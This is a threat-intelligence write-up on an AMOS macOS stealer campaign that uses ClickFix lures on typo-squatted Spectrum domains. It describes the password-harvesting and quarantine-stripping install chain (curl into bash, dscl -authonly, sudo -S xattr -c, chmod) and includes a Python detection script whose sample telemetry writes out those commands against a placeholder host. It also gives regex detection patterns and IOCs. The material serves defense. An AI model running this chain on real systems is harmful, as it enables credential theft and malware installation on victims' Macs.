AMOS macOS Stealer Evades Security to Deploy Malicious Code
A newly uncovered campaign involving an Atomic macOS Stealer (AMOS) variant has emerged, showcasing the evolving sophistication of multi-platform social engineering attacks.
This campaign, discovered during routine attacker infrastructure analysis, leverages typo-squatted domains mimicking Spectrum, a prominent U.S.-based telecommunications provider offering cable television, internet, and managed services.
By employing the Clickfix method, attackers deliver tailored payloads based on the victim’s operating system, with macOS users specifically targeted by a malicious shell script designed to harvest system passwords and deploy an AMOS variant for deeper exploitation.

This operation, marked by Russian-language comments in the source code, points to the likely involvement of Russian-speaking cybercriminals, while its poorly implemented delivery logic reveals a hastily constructed yet dangerous infrastructure.
Deceptive Delivery
The attack begins with victims being lured to typo-squatted domains such as panel-spectrum[.]net and spectrum-ticket[.]net, where they are prompted to click on an “Alternative Verification” option.
This action copies a malicious command to the clipboard, accompanied by platform-specific instructions that often contain inconsistencies such as displaying Windows-specific guidance to macOS users.
For non-macOS user agents, the copied command is a PowerShell one-liner that downloads and executes a script from a command-and-control (C2) host such as cf-verifi.pages[.]dev, a Cloudflare Pages hostname.
macOS users instead receive a Bash command that fetches a script from applemacios[.]com/getrur/install.sh with curl's silent and redirect-following flags and runs it in the shell.
According to the CloudSEK report, the script chains native macOS utilities: it harvests the victim's password through a "System Password" dialog that reappears until a valid password is entered, checks each attempt against the local directory with dscl . -authonly, and writes the accepted password to /tmp/.pass.
It then downloads a binary named "update" (MD5 eaedee8fc9fe336bcde021bf243e332a) from applemacios[.]com/getrur/update, feeds the stolen password to sudo -S on stdin to run xattr -c against the file, which clears every extended attribute including com.apple.quarantine so Gatekeeper never evaluates it, marks it executable with chmod +x, and launches it; that binary is the AMOS variant.
Because every stage is carried out by built-in tools (curl, dscl, sudo, xattr, chmod) rather than a recognisable dropper, signature-based endpoint controls have little to key on, and the stolen credential plus the resulting foothold can be turned toward lateral movement inside corporate environments, with ransomware or data exfiltration as likely follow-on goals.
Defensive Strategies
The implications of this AMOS campaign are severe, particularly for corporate users whose stolen credentials could grant access to VPNs, internal systems, and sensitive resources.
The use of native macOS commands to bypass security mechanisms underscores the challenge of detecting such threats with conventional antivirus or EDR tools.
To mitigate risks, organizations must prioritize user awareness training to recognize deceptive password prompts and system verification tactics.
Hardening macOS endpoints helps, with one caveat: Gatekeeper only evaluates files that carry the com.apple.quarantine attribute, which is exactly what this script strips, and a script piped from curl into bash never receives that attribute in the first place; hardening therefore has to come from MDM-enforced policy (keeping System Integrity Protection enabled, restricting which applications and scripts users may run) rather than from Gatekeeper alone.
Threat hunting on process telemetry for sudo invoked with -S from a shell script, xattr stripping attributes from freshly downloaded files in /tmp, dscl -authonly calls outside normal login flows, and the known AMOS indicators listed below can surface this compromise early.
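The chain described in the previous section and the hunting advice above suggest a direct detection: group process-execution events into process trees and score each tree on which stages of the chain it contains. The Python below is an added example written for this article, not CloudSEK's or the attacker's code. It assumes exec telemetry exported as records with ts, pid, ppid, exe and cmdline fields (an assumption about what an EDR or Endpoint Security export looks like, not a specific vendor format), and the sample events are constructed, with the attacker domain replaced by a placeholder.

```python
"""Hunt for the AMOS / ClickFix install chain in macOS process-exec telemetry.

Added example. Event field names (ts, pid, ppid, exe, cmdline) are an assumption
about the telemetry export, not a vendor format. Events are grouped into process
trees and each tree is scored on which stages of the chain it contains.
"""
import re
from collections import defaultdict

# Stage patterns, each matched against a full command line.
CURL_PIPE_SHELL = re.compile(r"\bcurl\b[^|]*\|\s*(?:/bin/)?(?:ba|z)?sh\b")
DSCL_AUTHONLY = re.compile(r"\bdscl\s+\.\s+-authonly\b")      # local password check
TMP_PASS = re.compile(r"/tmp/\.pass\b")                         # staged password file
SUDO_STDIN = re.compile(r"\bsudo\b(?:\s+-\w+)*\s+-\w*S\w*\b")   # password fed on stdin
# xattr -c clears every extended attribute; -d com.apple.quarantine is the
# targeted form. Either removes the flag Gatekeeper keys on.
XATTR_STRIP = re.compile(
    r"\bxattr\b(?:\s+-\w+)*\s+(?:-\w*c\w*\b|-d\s+com\.apple\.quarantine\b)"
)
CHMOD = re.compile(r"\bchmod\s+(?:-\w+\s+)*(\S+)\s+(\S+)")     # (mode, target)


def _mode_adds_exec(mode: str) -> bool:
    """True for symbolic modes that add x (u+x, a+rwx) or octal modes with an x bit."""
    if re.fullmatch(r"[0-7]{3,4}", mode):
        return int(mode, 8) & 0o111 != 0
    return "+" in mode and "x" in mode.split("+", 1)[1]


def _tree_roots(events):
    """Map each pid to its top-most ancestor present in the event set."""
    by_pid = {e["pid"]: e for e in events}

    def root(pid):
        seen = set()
        while by_pid[pid]["ppid"] in by_pid and pid not in seen:
            seen.add(pid)
            pid = by_pid[pid]["ppid"]
        return pid

    return {e["pid"]: root(e["pid"]) for e in events}


def score_tree(evs):
    """Return the chain stages observed in one process tree, in event order."""
    stages, chmod_targets = [], set()

    def add(stage):
        if stage not in stages:
            stages.append(stage)

    for e in sorted(evs, key=lambda x: x["ts"]):
        c = e["cmdline"]
        if CURL_PIPE_SHELL.search(c):
            add("curl_pipe_shell")
        if DSCL_AUTHONLY.search(c):
            add("dscl_authonly")
        if TMP_PASS.search(c):
            add("tmp_pass_file")
        if SUDO_STDIN.search(c):
            add("sudo_stdin")
        if XATTR_STRIP.search(c):   # sudo's argv carries the child command too
            add("xattr_strip")
        m = CHMOD.search(c)
        if m and _mode_adds_exec(m.group(1)):
            chmod_targets.add(m.group(2))
            add("chmod_exec")
        if e["exe"] in chmod_targets:   # the file just made executable now runs
            add("exec_dropped")
    return stages


def verdict(stages):
    """High only for pairings with no ordinary reason to co-occur in a session."""
    s = set(stages)
    if {"xattr_strip", "exec_dropped"} <= s or {"dscl_authonly", "sudo_stdin"} <= s:
        return "high"
    return {0: "none", 1: "low"}.get(len(s), "medium")


def hunt(events):
    """Group events into process trees; return {root_pid: (verdict, stages)}."""
    roots = _tree_roots(events)
    trees = defaultdict(list)
    for e in events:
        trees[roots[e["pid"]]].append(e)
    out = {}
    for r, evs in trees.items():
        st = score_tree(evs)
        out[r] = (verdict(st), st)
    return out


# Constructed telemetry: pids 500-508 mirror the chain from the write-up (placeholder
# domain), pids 600-601 a developer running a vendor installer, pid 700 a lone chmod.
SAMPLE_EVENTS = [
    {"ts": 1, "pid": 500, "ppid": 100, "exe": "/bin/bash",
     "cmdline": 'bash -c "curl -fsSL https://example.invalid/getrur/install.sh | bash"'},
    {"ts": 2, "pid": 501, "ppid": 500, "exe": "/usr/bin/curl",
     "cmdline": "curl -fsSL https://example.invalid/getrur/install.sh"},
    {"ts": 3, "pid": 502, "ppid": 500, "exe": "/bin/bash", "cmdline": "bash"},
    {"ts": 4, "pid": 503, "ppid": 502, "exe": "/usr/bin/dscl",
     "cmdline": "dscl . -authonly jdoe hunter2"},
    {"ts": 5, "pid": 504, "ppid": 502, "exe": "/usr/bin/curl",
     "cmdline": "curl -fsSL https://example.invalid/getrur/update -o /tmp/update"},
    {"ts": 6, "pid": 505, "ppid": 502, "exe": "/bin/cat", "cmdline": "cat /tmp/.pass"},
    {"ts": 7, "pid": 506, "ppid": 502, "exe": "/usr/bin/sudo",
     "cmdline": "sudo -S xattr -c /tmp/update"},
    {"ts": 8, "pid": 507, "ppid": 502, "exe": "/bin/chmod", "cmdline": "chmod +x /tmp/update"},
    {"ts": 9, "pid": 508, "ppid": 502, "exe": "/tmp/update", "cmdline": "/tmp/update"},
    {"ts": 10, "pid": 600, "ppid": 100, "exe": "/bin/bash",
     "cmdline": 'bash -c "curl -fsSL https://example.invalid/install.sh | bash"'},
    {"ts": 11, "pid": 601, "ppid": 600, "exe": "/bin/chmod",
     "cmdline": "chmod 755 /opt/tool/bin/tool"},
    {"ts": 12, "pid": 700, "ppid": 200, "exe": "/bin/chmod", "cmdline": "chmod +x build.sh"},
]

if __name__ == "__main__":
    for root_pid, (level, stages) in hunt(SAMPLE_EVENTS).items():
        print(f"tree {root_pid}: {level} {stages}")
```

The curl-into-bash and chmod stages are common in legitimate installers, so on their own they only raise a tree to medium; a high verdict requires the quarantine strip followed by execution of the same file, or a dscl -authonly check paired with sudo -S, which are the pairings a user session has no ordinary reason to produce. The password dialog itself is not modelled because the write-up does not name the utility that displays it.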
This campaign highlights the growing trend of cross-platform attacks, urging both consumer and corporate defenders to remain vigilant against socially engineered threats.
Indicators of Compromise (IOCs)
Indicator Type | Value | Use |
---|---|---|
Domain | panel-spectrum[.]net | Clickfix Delivery |
Domain | spectrum-ticket[.]net | Clickfix Delivery |
Domain | cf-verifi.pages[.]dev | Command and Control |
Domain | applemacios[.]com | Command and Control |
MD5 Hash | eaedee8fc9fe336bcde021bf243e332a | AMOS Variant |
URL | https://cf-verifi.pages[.]dev/i.txt | Contacted URLs |
URL | https://applemacios[.]com/getrur/install.sh | Contacted URLs |
URL | https://applemacios[.]com/getrur/update | Contacted URLs |
Domain | rugmel[.]cat | Clickfix Indicator of Future Attack |